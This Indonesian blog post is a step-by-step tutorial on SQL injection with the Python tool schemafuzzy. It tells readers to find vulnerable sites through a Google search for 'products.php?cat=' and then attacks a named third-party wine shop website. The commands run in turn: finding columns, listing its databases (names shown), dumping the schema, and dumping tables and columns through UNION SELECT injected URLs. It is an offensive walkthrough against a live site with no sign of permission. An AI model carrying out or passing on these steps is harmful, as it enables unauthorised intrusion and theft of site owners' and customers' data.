Sql Injection dengan Program Python
Cherbond-Cyber4rt, Kali ini kita akan memposting Sql Injection dengan Program Python.
Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website…
feature dan hal2 yang di butuhkan yaitu :
1. Komputer
2. Koneksi internet
3. Program Python-2.6.4 ( Kalian bisa donkload softwarenya di sini : Klik Here )
4. Script schemafuzzy.py ( Kalian bisa donkload softwarenya di sini : Klik Here )
5. CMD
6. Target website (misal menggunakan kata kunci di google : “products.php?cat=”) Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4.
- Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan.
Caranya : klik start>>Run>>CMD
terus aktif ke directory c:\ dengan mengetik CD ../.. <– mundur 2 dir
masuk ke directory Python26 dengan cara ketik “cd Python26″ hingga muncul C:\Python26>
Perintah dasar schemafuzzy ini yaitu : schemafuzzy.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :
http://www.queenannewine.com/products.php?cat=1
2. Cek kolomnya
python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol
3. Setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <= di sini ada hasil column yang berhasil di cari tadi
4. Cari DB nya..
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ -dbs
Kita sudah temukan data base site tersebut :
1. C239128_QAWcal
2. C239128_queen
3. C239128_queen2
tapi pada penjesalan ini kita akan gunakan database nomor2
4. Cari nama table dalam database C239128_queen
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –schema -D C239128_queen
5. Exploit Tables and Columns :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T – di isi Nama table -C di isi nama colum.
Sekian postingan dari kami, jika ada postingan kami yang belum kalian pahami kami mohon maaf atas semua kesalahan kami.
.jpg)
0 komentar:
Posting Komentar